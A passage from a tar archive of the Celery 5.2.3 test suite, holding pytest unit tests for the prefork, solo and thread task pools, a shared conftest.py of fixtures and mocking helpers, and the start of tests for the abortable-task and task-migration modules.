= True def terminate_job(self, *args, **kwargs): pass def restart(self, *args, **kwargs): pass def handle_result_event(self, *args, **kwargs): pass def flush(self): pass def grow(self, n=1): self._processes += n def shrink(self, n=1): self._processes -= n def apply_async(self, *args, **kwargs): pass def register_with_event_loop(self, loop): pass class ExeMockPool(MockPool): def apply_async(self, target, args=(), kwargs={}, callback=noop): from threading import Timer res = target(*args, **kwargs) Timer(0.1, callback, (res,)).start() return MockResult(res, next(self._current_proc)) class TaskPool(mp.TaskPool): Pool = BlockingPool = MockPool class ExeMockTaskPool(mp.TaskPool): Pool = BlockingPool = ExeMockPool @t.skip.if_win32 class test_AsynPool: def setup(self): pytest.importorskip('multiprocessing') def test_gen_not_started(self): def gen(): yield 1 yield 2 g = gen() assert asynpool.gen_not_started(g) next(g) assert not asynpool.gen_not_started(g) list(g) assert not asynpool.gen_not_started(g) @patch('select.select', create=True) def test_select(self, __select): ebadf = socket.error() ebadf.errno = errno.EBADF with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.return_value = {3}, set(), 0 assert asynpool._select({3}, poll=poll) == ({3}, set(), 0) poll.return_value = {3}, set(), 0 assert 
asynpool._select({3}, None, {3}, poll=poll) == ( {3}, set(), 0, ) eintr = socket.error() eintr.errno = errno.EINTR poll.side_effect = eintr readers = {3} assert asynpool._select(readers, poll=poll) == (set(), set(), 1) assert 3 in readers with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = ebadf with patch('select.select') as selcheck: selcheck.side_effect = ebadf readers = {3} assert asynpool._select(readers, poll=poll) == ( set(), set(), 1, ) assert 3 not in readers with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = MemoryError() with pytest.raises(MemoryError): asynpool._select({1}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') with patch('select.select') as selcheck: def se(*args): selcheck.side_effect = MemoryError() raise ebadf poll.side_effect = se with pytest.raises(MemoryError): asynpool._select({3}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') with patch('select.select') as selcheck: def se2(*args): selcheck.side_effect = socket.error() selcheck.side_effect.errno = 1321 raise ebadf poll.side_effect = se2 with pytest.raises(socket.error): asynpool._select({3}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = socket.error() poll.side_effect.errno = 34134 with pytest.raises(socket.error): asynpool._select({3}, poll=poll) def test_promise(self): fun = Mock() x = asynpool.promise(fun, (1,), {'foo': 1}) x() assert x.ready fun.assert_called_with(1, foo=1) def test_Worker(self): w = asynpool.Worker(Mock(), Mock()) w.on_loop_start(1234) w.outq.put.assert_called_with((asynpool.WORKER_UP, (1234,))) def test_iterate_file_descriptors_safely_source_data_list(self): # Given: a list of integers that could be file descriptors fd_iter = [1, 2, 3, 4, 5] # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == [], "Expected all items removed from managed list" def test_iterate_file_descriptors_safely_source_data_set(self): # Given: a list of integers that could be file descriptors fd_iter = {1, 2, 3, 4, 5} # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == set(), "Expected all items removed from managed set" def test_iterate_file_descriptors_safely_source_data_dict(self): # Given: a list of integers that could be file descriptors fd_iter = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5} # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == {}, "Expected all items removed from managed dict" def 
test_register_with_event_loop__no_on_tick_dupes(self): """Ensure AsynPool's register_with_event_loop only registers on_poll_start in the event loop the first time it's called. This prevents a leak when the Consumer is restarted. """ pool = asynpool.AsynPool(threads=False) hub = Mock(name='hub') pool.register_with_event_loop(hub) pool.register_with_event_loop(hub) hub.on_tick.add.assert_called_once() @t.skip.if_win32 class test_ResultHandler: def setup(self): pytest.importorskip('multiprocessing') def test_process_result(self): x = asynpool.ResultHandler( Mock(), Mock(), {}, Mock(), Mock(), Mock(), Mock(), Mock(), fileno_to_outq={}, on_process_alive=Mock(), on_job_ready=Mock(), ) assert x hub = Mock(name='hub') recv = x._recv_message = Mock(name='recv_message') recv.return_value = iter([]) x.on_state_change = Mock() x.register_with_event_loop(hub) proc = x.fileno_to_outq[3] = Mock() reader = proc.outq._reader reader.poll.return_value = False x.handle_event(6) # KeyError x.handle_event(3) x._recv_message.assert_called_with( hub.add_reader, 3, x.on_state_change, ) class test_TaskPool: def test_start(self): pool = TaskPool(10) pool.start() assert pool._pool.started assert pool._pool._state == asynpool.RUN _pool = pool._pool pool.stop() assert _pool.closed assert _pool.joined pool.stop() pool.start() _pool = pool._pool pool.terminate() pool.terminate() assert _pool.terminated def test_restart(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool.restart() pool._pool.restart.assert_called_with() pool._pool.apply_async.assert_called_with(mp.noop) def test_did_start_ok(self): pool = TaskPool(10) pool._pool = Mock(name='pool') assert pool.did_start_ok() is pool._pool.did_start_ok() def test_register_with_event_loop(self): pool = TaskPool(10) pool._pool = Mock(name='pool') loop = Mock(name='loop') pool.register_with_event_loop(loop) pool._pool.register_with_event_loop.assert_called_with(loop) def test_on_close(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool._pool._state = mp.RUN pool.on_close() pool._pool.close.assert_called_with() def test_on_close__pool_not_running(self): pool = TaskPool(10) pool._pool = Mock(name='pool') pool._pool._state = mp.CLOSE pool.on_close() pool._pool.close.assert_not_called() def test_apply_async(self): pool = TaskPool(10) pool.start() pool.apply_async(lambda x: x, (2,), {}) def test_grow_shrink(self): pool = TaskPool(10) pool.start() assert pool._pool._processes == 10 pool.grow() assert pool._pool._processes == 11 pool.shrink(2) assert pool._pool._processes == 9 def test_info(self): pool = TaskPool(10) procs = [Bunch(pid=i) for i in range(pool.limit)] class _Pool: _pool = procs _maxtasksperchild = None timeout = 10 soft_timeout = 5 def human_write_stats(self, *args, **kwargs): return {} pool._pool = _Pool() info = pool.info assert info['max-concurrency'] == pool.limit assert info['max-tasks-per-child'] == 'N/A' assert info['timeouts'] == (5, 10) def test_num_processes(self): pool = TaskPool(7) pool.start() assert pool.num_processes == 7 @patch('billiard.forking_enable') def test_on_start_proc_alive_timeout_default(self, __forking_enable): app = Mock(conf=AttributeDict(DEFAULTS)) pool = TaskPool(4, app=app) pool.on_start() assert pool._pool._proc_alive_timeout == 4.0 @patch('billiard.forking_enable') def test_on_start_proc_alive_timeout_custom(self, __forking_enable): app = Mock(conf=AttributeDict(DEFAULTS)) app.conf.worker_proc_alive_timeout = 8.0 pool = TaskPool(4, app=app) pool.on_start() assert pool._pool._proc_alive_timeout == 8.0 
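# --------------------------------------------------------------------------
# Illustrative sketch (added here, not part of the packaged test suite): the
# prefork tests above show that TaskPool.on_start() picks up the
# ``worker_proc_alive_timeout`` setting (4.0 seconds with the stock DEFAULTS,
# 8.0 when overridden).  A minimal way to set it on an application follows;
# the app name and broker URL are placeholders, not values from these tests.
from celery import Celery

sketch_app = Celery('sketch_app', broker='memory://')
# Seconds to wait for a newly forked pool worker process to start up.
sketch_app.conf.worker_proc_alive_timeout = 8.0
# --------------------------------------------------------------------------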
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_solo.py0000664000175000017500000000152000000000000021034 0ustar00asifasif00000000000000import operator from unittest.mock import Mock from celery import signals from celery.concurrency import solo from celery.utils.functional import noop class test_solo_TaskPool: def test_on_start(self): x = solo.TaskPool() x.on_start() def test_on_apply(self): x = solo.TaskPool() x.on_start() x.on_apply(operator.add, (2, 2), {}, noop, noop) def test_info(self): x = solo.TaskPool() x.on_start() assert x.info def test_on_worker_process_init_called(self): """Upon the initialization of a new solo worker pool a worker_process_init signal should be emitted""" on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) solo.TaskPool() assert on_worker_process_init.call_count == 1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_thread.py0000664000175000017500000000133000000000000021326 0ustar00asifasif00000000000000import operator import pytest from celery.utils.functional import noop class test_thread_TaskPool: def test_on_apply(self): from celery.concurrency import thread x = thread.TaskPool() try: x.on_apply(operator.add, (2, 2), {}, noop, noop) finally: x.stop() def test_info(self): from celery.concurrency import thread x = thread.TaskPool() try: assert x.info finally: x.stop() def test_on_stop(self): from celery.concurrency import thread x = thread.TaskPool() x.on_stop() with pytest.raises(RuntimeError): x.on_apply(operator.add, (2, 2), {}, noop, noop) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/conftest.py0000664000175000017500000005555200000000000016332 0ustar00asifasif00000000000000import builtins import inspect import io import logging import os import platform import sys import threading import types import warnings from contextlib import contextmanager from functools import wraps from importlib import import_module, reload from unittest.mock import MagicMock, Mock, patch import pytest from kombu import Queue from celery.backends.cache import CacheBackend, DummyClient # we have to import the pytest plugin fixtures here, # in case user did not do the `python setup.py develop` yet, # that installs the pytest plugin into the setuptools registry. from celery.contrib.pytest import (celery_app, celery_enable_logging, celery_parameters, depends_on_current_app) from celery.contrib.testing.app import TestApp, Trap from celery.contrib.testing.mocks import (TaskMessage, TaskMessage1, task_message_from_sig) # Tricks flake8 into silencing redefining fixtures warnings. 
__all__ = ( 'celery_app', 'celery_enable_logging', 'depends_on_current_app', 'celery_parameters' ) try: WindowsError = WindowsError except NameError: class WindowsError(Exception): pass PYPY3 = getattr(sys, 'pypy_version_info', None) and sys.version_info[0] > 3 CASE_LOG_REDIRECT_EFFECT = 'Test {0} didn\'t disable LoggingProxy for {1}' CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger' CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger' _SIO_write = io.StringIO.write _SIO_init = io.StringIO.__init__ SENTINEL = object() def noop(*args, **kwargs): pass class WhateverIO(io.StringIO): def __init__(self, v=None, *a, **kw): _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) def write(self, data): _SIO_write(self, data.decode() if isinstance(data, bytes) else data) @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'memory://', 'broker_transport_options': { 'polling_interval': 0.1 }, 'result_backend': 'cache+memory://', 'task_default_queue': 'testcelery', 'task_default_exchange': 'testcelery', 'task_default_routing_key': 'testcelery', 'task_queues': ( Queue('testcelery', routing_key='testcelery'), ), 'accept_content': ('json', 'pickle'), # Mongo results tests (only executed if installed and running) 'mongodb_backend_settings': { 'host': os.environ.get('MONGO_HOST') or 'localhost', 'port': os.environ.get('MONGO_PORT') or 27017, 'database': os.environ.get('MONGO_DB') or 'celery_unittests', 'taskmeta_collection': ( os.environ.get('MONGO_TASKMETA_COLLECTION') or 'taskmeta_collection' ), 'user': os.environ.get('MONGO_USER'), 'password': os.environ.get('MONGO_PASSWORD'), } } @pytest.fixture(scope='session') def use_celery_app_trap(): return True @pytest.fixture(autouse=True) def reset_cache_backend_state(celery_app): """Fixture that resets the internal state of the cache result backend.""" yield backend = celery_app.__dict__.get('backend') if backend is not None: if isinstance(backend, CacheBackend): if isinstance(backend.client, DummyClient): backend.client.cache.clear() backend._cache.clear() @contextmanager def assert_signal_called(signal, **expected): """Context that verifes signal is called before exiting.""" handler = Mock() def on_call(**kwargs): return handler(**kwargs) signal.connect(on_call) try: yield handler finally: signal.disconnect(on_call) handler.assert_called_with(signal=signal, **expected) @pytest.fixture def app(celery_app): yield celery_app @pytest.fixture(autouse=True, scope='session') def AAA_disable_multiprocessing(): # pytest-cov breaks if a multiprocessing.Process is started, # so disable them completely to make sure it doesn't happen. 
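# The targets below cover the stdlib Process class and every billiard alias
# of it, so no import path can start a real OS process during the unit-test
# session; the patch contexts are exited again when this session-scoped
# fixture finalizes.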
stuff = [ 'multiprocessing.Process', 'billiard.Process', 'billiard.context.Process', 'billiard.process.Process', 'billiard.process.BaseProcess', 'multiprocessing.Process', ] ctxs = [patch(s) for s in stuff] [ctx.__enter__() for ctx in ctxs] yield [ctx.__exit__(*sys.exc_info()) for ctx in ctxs] def alive_threads(): return [ thread for thread in threading.enumerate() if not thread.name.startswith("pytest_timeout ") and thread.is_alive() ] @pytest.fixture(autouse=True) def task_join_will_not_block(): from celery import _state, result prev_res_join_block = result.task_join_will_block _state.orig_task_join_will_block = _state.task_join_will_block prev_state_join_block = _state.task_join_will_block result.task_join_will_block = \ _state.task_join_will_block = lambda: False _state._set_task_join_will_block(False) yield result.task_join_will_block = prev_res_join_block _state.task_join_will_block = prev_state_join_block _state._set_task_join_will_block(False) @pytest.fixture(scope='session', autouse=True) def record_threads_at_startup(request): try: request.session._threads_at_startup except AttributeError: request.session._threads_at_startup = alive_threads() @pytest.fixture(autouse=True) def threads_not_lingering(request): yield assert request.session._threads_at_startup == alive_threads() @pytest.fixture(autouse=True) def AAA_reset_CELERY_LOADER_env(): yield assert not os.environ.get('CELERY_LOADER') @pytest.fixture(autouse=True) def test_cases_shortcuts(request, app, patching, celery_config): if request.instance: @app.task def add(x, y): return x + y # IMPORTANT: We set an .app attribute for every test case class. request.instance.app = app request.instance.Celery = TestApp request.instance.assert_signal_called = assert_signal_called request.instance.task_message_from_sig = task_message_from_sig request.instance.TaskMessage = TaskMessage request.instance.TaskMessage1 = TaskMessage1 request.instance.CELERY_TEST_CONFIG = celery_config request.instance.add = add request.instance.patching = patching yield if request.instance: request.instance.app = None @pytest.fixture(autouse=True) def sanity_no_shutdown_flags_set(): yield # Make sure no test left the shutdown flags enabled. 
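# The ``is not False`` assertions reject an explicit ``False`` value on the
# flags, while the ``not ...`` assertions reject any other truthy exit code
# a test might have left set.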
from celery.worker import state as worker_state # check for EX_OK assert worker_state.should_stop is not False assert worker_state.should_terminate is not False # check for other true values assert not worker_state.should_stop assert not worker_state.should_terminate @pytest.fixture(autouse=True) def sanity_stdouts(request): yield from celery.utils.log import LoggingProxy assert sys.stdout assert sys.stderr assert sys.__stdout__ assert sys.__stderr__ this = request.node.name if isinstance(sys.stdout, (LoggingProxy, Mock)) or \ isinstance(sys.__stdout__, (LoggingProxy, Mock)): raise RuntimeError(CASE_LOG_REDIRECT_EFFECT.format(this, 'stdout')) if isinstance(sys.stderr, (LoggingProxy, Mock)) or \ isinstance(sys.__stderr__, (LoggingProxy, Mock)): raise RuntimeError(CASE_LOG_REDIRECT_EFFECT.format(this, 'stderr')) @pytest.fixture(autouse=True) def sanity_logging_side_effects(request): from _pytest.logging import LogCaptureHandler root = logging.getLogger() rootlevel = root.level roothandlers = [ x for x in root.handlers if not isinstance(x, LogCaptureHandler)] yield this = request.node.name root_now = logging.getLogger() if root_now.level != rootlevel: raise RuntimeError(CASE_LOG_LEVEL_EFFECT.format(this)) newhandlers = [x for x in root_now.handlers if not isinstance( x, LogCaptureHandler)] if newhandlers != roothandlers: raise RuntimeError(CASE_LOG_HANDLER_EFFECT.format(this)) def setup_session(scope='session'): using_coverage = ( os.environ.get('COVER_ALL_MODULES') or '--with-coverage' in sys.argv ) os.environ.update( # warn if config module not found C_WNOCONF='yes', KOMBU_DISABLE_LIMIT_PROTECTION='yes', ) if using_coverage and not PYPY3: from warnings import catch_warnings with catch_warnings(record=True): import_all_modules() warnings.resetwarnings() from celery._state import set_default_app set_default_app(Trap()) def teardown(): # Don't want SUBDEBUG log messages at finalization. try: from multiprocessing.util import get_logger except ImportError: pass else: get_logger().setLevel(logging.WARNING) # Make sure test database is removed. import os if os.path.exists('test.db'): try: os.remove('test.db') except OSError: pass # Make sure there are no remaining threads at shutdown. import threading remaining_threads = [thread for thread in threading.enumerate() if thread.getName() != 'MainThread'] if remaining_threads: sys.stderr.write( '\n\n**WARNING**: Remaining threads at teardown: %r...\n' % ( remaining_threads)) def find_distribution_modules(name=__name__, file=__file__): current_dist_depth = len(name.split('.')) - 1 current_dist = os.path.join(os.path.dirname(file), *([os.pardir] * current_dist_depth)) abs = os.path.abspath(current_dist) dist_name = os.path.basename(abs) for dirpath, dirnames, filenames in os.walk(abs): package = (dist_name + dirpath[len(abs):]).replace('/', '.') if '__init__.py' in filenames: yield package for filename in filenames: if filename.endswith('.py') and filename != '__init__.py': yield '.'.join([package, filename])[:-3] def import_all_modules(name=__name__, file=__file__, skip=('celery.decorators', 'celery.task')): for module in find_distribution_modules(name, file): if not module.startswith(skip): try: import_module(module) except ImportError: pass except OSError as exc: warnings.warn(UserWarning( 'Ignored error importing module {}: {!r}'.format( module, exc, ))) @pytest.fixture def sleepdeprived(request): """Mock sleep method in patched module to do nothing. 
Example: >>> import time >>> @pytest.mark.sleepdeprived_patched_module(time) >>> def test_foo(self, sleepdeprived): >>> pass """ module = request.node.get_closest_marker( "sleepdeprived_patched_module").args[0] old_sleep, module.sleep = module.sleep, noop try: yield finally: module.sleep = old_sleep # Taken from # http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py @pytest.fixture def mask_modules(request): """Ban some modules from being importable inside the context For example:: >>> @pytest.mark.masked_modules('gevent.monkey') >>> def test_foo(self, mask_modules): ... try: ... import sys ... except ImportError: ... print('sys not found') sys not found """ realimport = builtins.__import__ modnames = request.node.get_closest_marker("masked_modules").args def myimp(name, *args, **kwargs): if name in modnames: raise ImportError('No module named %s' % name) else: return realimport(name, *args, **kwargs) builtins.__import__ = myimp try: yield finally: builtins.__import__ = realimport @pytest.fixture def environ(request): """Mock environment variable value. Example:: >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings') >>> def test_other_settings(self, environ): ... ... """ env_name, env_value = request.node.get_closest_marker("patched_environ").args prev_val = os.environ.get(env_name, SENTINEL) os.environ[env_name] = env_value try: yield finally: if prev_val is SENTINEL: os.environ.pop(env_name, None) else: os.environ[env_name] = prev_val def replace_module_value(module, name, value=None): """Mock module value, given a module, attribute name and value. Example:: >>> replace_module_value(module, 'CONSTANT', 3.03) """ has_prev = hasattr(module, name) prev = getattr(module, name, None) if value: setattr(module, name, value) else: try: delattr(module, name) except AttributeError: pass try: yield finally: if prev is not None: setattr(module, name, prev) if not has_prev: try: delattr(module, name) except AttributeError: pass @contextmanager def platform_pyimp(value=None): """Mock :data:`platform.python_implementation` Example:: >>> with platform_pyimp('PyPy'): ... ... """ yield from replace_module_value(platform, 'python_implementation', value) @contextmanager def sys_platform(value=None): """Mock :data:`sys.platform` Example:: >>> mock.sys_platform('darwin'): ... ... """ prev, sys.platform = sys.platform, value try: yield finally: sys.platform = prev @contextmanager def pypy_version(value=None): """Mock :data:`sys.pypy_version_info` Example:: >>> with pypy_version((3, 6, 1)): ... ... """ yield from replace_module_value(sys, 'pypy_version_info', value) def _restore_logging(): outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ root = logging.getLogger() level = root.level handlers = root.handlers try: yield finally: sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs root.level = level root.handlers[:] = handlers @contextmanager def restore_logging_context_manager(): """Restore root logger handlers after test returns. Example:: >>> with restore_logging_context_manager(): ... setup_logging() """ yield from _restore_logging() @pytest.fixture def restore_logging(request): """Restore root logger handlers after test returns. Example:: >>> def test_foo(self, restore_logging): ... 
setup_logging() """ yield from _restore_logging() @pytest.fixture def module(request): """Mock one or modules such that every attribute is a :class:`Mock`.""" yield from _module(*request.node.get_closest_marker("patched_module").args) @contextmanager def module_context_manager(*names): """Mock one or modules such that every attribute is a :class:`Mock`.""" yield from _module(*names) def _module(*names): prev = {} class MockModule(types.ModuleType): def __getattr__(self, attr): setattr(self, attr, Mock()) return types.ModuleType.__getattribute__(self, attr) mods = [] for name in names: try: prev[name] = sys.modules[name] except KeyError: pass mod = sys.modules[name] = MockModule(name) mods.append(mod) try: yield mods finally: for name in names: try: sys.modules[name] = prev[name] except KeyError: try: del(sys.modules[name]) except KeyError: pass class _patching: def __init__(self, monkeypatch, request): self.monkeypatch = monkeypatch self.request = request def __getattr__(self, name): return getattr(self.monkeypatch, name) def __call__(self, path, value=SENTINEL, name=None, new=MagicMock, **kwargs): value = self._value_or_mock(value, new, name, path, **kwargs) self.monkeypatch.setattr(path, value) return value def object(self, target, attribute, *args, **kwargs): return _wrap_context( patch.object(target, attribute, *args, **kwargs), self.request) def _value_or_mock(self, value, new, name, path, **kwargs): if value is SENTINEL: value = new(name=name or path.rpartition('.')[2]) for k, v in kwargs.items(): setattr(value, k, v) return value def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs): # alias to __call__ with the interface of pytest.monkeypatch.setattr if value is SENTINEL: value, name = name, None return self(target, value, name=name) def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs): # same as pytest.monkeypatch.setattr but default value is MagicMock value = self._value_or_mock(value, new, name, dic, **kwargs) self.monkeypatch.setitem(dic, name, value) return value def modules(self, *mods): modules = [] for mod in mods: mod = mod.split('.') modules.extend(reversed([ '.'.join(mod[:-i] if i else mod) for i in range(len(mod)) ])) modules = sorted(set(modules)) return _wrap_context(module_context_manager(*modules), self.request) def _wrap_context(context, request): ret = context.__enter__() def fin(): context.__exit__(*sys.exc_info()) request.addfinalizer(fin) return ret @pytest.fixture() def patching(monkeypatch, request): """Monkeypath.setattr shortcut. Example: .. code-block:: python >>> def test_foo(patching): >>> # execv value here will be mock.MagicMock by default. >>> execv = patching('os.execv') >>> patching('sys.platform', 'darwin') # set concrete value >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings') >>> # val will be of type mock.MagicMock by default >>> val = patching.setitem('path.to.dict', 'KEY') """ return _patching(monkeypatch, request) @contextmanager def stdouts(): """Override `sys.stdout` and `sys.stderr` with `StringIO` instances. >>> with conftest.stdouts() as (stdout, stderr): ... something() ... 
self.assertIn('foo', stdout.getvalue()) """ prev_out, prev_err = sys.stdout, sys.stderr prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__ mystdout, mystderr = WhateverIO(), WhateverIO() sys.stdout = sys.__stdout__ = mystdout sys.stderr = sys.__stderr__ = mystderr try: yield mystdout, mystderr finally: sys.stdout = prev_out sys.stderr = prev_err sys.__stdout__ = prev_rout sys.__stderr__ = prev_rerr @contextmanager def reset_modules(*modules): """Remove modules from :data:`sys.modules` by name, and reset back again when the test/context returns. Example:: >>> with conftest.reset_modules('celery.result', 'celery.app.base'): ... pass """ prev = { k: sys.modules.pop(k) for k in modules if k in sys.modules } try: for k in modules: reload(import_module(k)) yield finally: sys.modules.update(prev) def get_logger_handlers(logger): return [ h for h in logger.handlers if not isinstance(h, logging.NullHandler) ] @contextmanager def wrap_logger(logger, loglevel=logging.ERROR): """Wrap :class:`logging.Logger` with a StringIO() handler. yields a StringIO handle. Example:: >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio: ... ... ... sio.getvalue() """ old_handlers = get_logger_handlers(logger) sio = WhateverIO() siohandler = logging.StreamHandler(sio) logger.handlers = [siohandler] try: yield sio finally: logger.handlers = old_handlers @contextmanager def _mock_context(mock): context = mock.return_value = Mock() context.__enter__ = Mock() context.__exit__ = Mock() def on_exit(*x): if x[0]: raise x[0] from x[1] context.__exit__.side_effect = on_exit context.__enter__.return_value = context try: yield context finally: context.reset() @contextmanager def open(side_effect=None): """Patch builtins.open so that it returns StringIO object. :param side_effect: Additional side effect for when the open context is entered. Example:: >>> with mock.open(io.BytesIO) as open_fh: ... something_opening_and_writing_bytes_to_a_file() ... self.assertIn(b'foo', open_fh.getvalue()) """ with patch('builtins.open') as open_: with _mock_context(open_) as context: if side_effect is not None: context.__enter__.side_effect = side_effect val = context.__enter__.return_value = WhateverIO() val.__exit__ = Mock() yield val @contextmanager def module_exists(*modules): """Patch one or more modules to ensure they exist. A module name with multiple paths (e.g. gevent.monkey) will ensure all parent modules are also patched (``gevent`` + ``gevent.monkey``). Example:: >>> with conftest.module_exists('gevent.monkey'): ... gevent.monkey.patch_all = Mock(name='patch_all') ... ... """ gen = [] old_modules = [] for module in modules: if isinstance(module, str): module = types.ModuleType(module) gen.append(module) if module.__name__ in sys.modules: old_modules.append(sys.modules[module.__name__]) sys.modules[module.__name__] = module name = module.__name__ if '.' 
in name: parent, _, attr = name.rpartition('.') setattr(sys.modules[parent], attr, module) try: yield finally: for module in gen: sys.modules.pop(module.__name__, None) for module in old_modules: sys.modules[module.__name__] = module def _bind(f, o): @wraps(f) def bound_meth(*fargs, **fkwargs): return f(o, *fargs, **fkwargs) return bound_meth class MockCallbacks: def __new__(cls, *args, **kwargs): r = Mock(name=cls.__name__) cls.__init__(r, *args, **kwargs) for key, value in vars(cls).items(): if key not in ('__dict__', '__weakref__', '__new__', '__init__'): if inspect.ismethod(value) or inspect.isfunction(value): r.__getattr__(key).side_effect = _bind(value, r) else: r.__setattr__(key, value) return r ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8117568 celery-5.2.3/t/unit/contrib/0000775000175000017500000000000000000000000015557 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/__init__.py0000664000175000017500000000000000000000000017656 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8117568 celery-5.2.3/t/unit/contrib/proj/0000775000175000017500000000000000000000000016531 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/__init__.py0000664000175000017500000000000000000000000020630 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/conf.py0000664000175000017500000000026700000000000020035 0ustar00asifasif00000000000000import os import sys extensions = ['sphinx.ext.autodoc', 'celery.contrib.sphinx'] autodoc_default_flags = ['members'] sys.path.insert(0, os.path.abspath(os.path.dirname(__file__))) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/contents.rst0000664000175000017500000000013500000000000021117 0ustar00asifasif00000000000000Documentation =============== .. toctree:: :maxdepth: 2 .. automodule:: foo :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/foo.py0000664000175000017500000000037100000000000017667 0ustar00asifasif00000000000000from xyzzy import plugh # noqa from celery import Celery, shared_task app = Celery() @app.task def bar(): """Task. This is a sample Task. """ @shared_task def baz(): """Shared Task. This is a sample Shared Task. 
""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/proj/xyzzy.py0000664000175000017500000000016100000000000020316 0ustar00asifasif00000000000000from celery import Celery app = Celery() @app.task def plugh(): """This task is in a different module!""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_abortable.py0000664000175000017500000000255300000000000021130 0ustar00asifasif00000000000000from celery.contrib.abortable import AbortableAsyncResult, AbortableTask class test_AbortableTask: def setup(self): @self.app.task(base=AbortableTask, shared=False) def abortable(): return True self.abortable = abortable def test_async_result_is_abortable(self): result = self.abortable.apply_async() tid = result.id assert isinstance( self.abortable.AsyncResult(tid), AbortableAsyncResult) def test_is_not_aborted(self): self.abortable.push_request() try: result = self.abortable.apply_async() tid = result.id assert not self.abortable.is_aborted(task_id=tid) finally: self.abortable.pop_request() def test_is_aborted_not_abort_result(self): self.abortable.AsyncResult = self.app.AsyncResult self.abortable.push_request() try: self.abortable.request.id = 'foo' assert not self.abortable.is_aborted() finally: self.abortable.pop_request() def test_abort_yields_aborted(self): self.abortable.push_request() try: result = self.abortable.apply_async() result.abort() tid = result.id assert self.abortable.is_aborted(task_id=tid) finally: self.abortable.pop_request() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/contrib/test_migrate.py0000664000175000017500000002474300000000000020632 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from amqp import ChannelError from kombu import Connection, Exchange, Producer, Queue from kombu.transport.virtual import QoS from kombu.utils.encoding import ensure_bytes from celery.contrib.migrate import (State, StopFiltering, _maybe_queue, expand_dest, filter_callback, filter_status, migrate_task, migrate_tasks, move, move_by_idmap, move_by_taskmap, move_task_by_id, start_filter, task_id_eq, task_id_in) from t.unit import conftest # hack to ignore error at shutdown QoS.restore_at_shutdown = False def Message(body, exchange='exchange', routing_key='rkey', compression=None, content_type='application/json', content_encoding='utf-8'): return Mock( body=body, delivery_info={ 'exchange': exchange, 'routing_key': routing_key, }, headers={ 'compression': compression, }, content_type=content_type, content_encoding=content_encoding, properties={ 'correlation_id': isinstance(body, dict) and body['id'] or None } ) class test_State: def test_strtotal(self): x = State() assert x.strtotal == '?' 
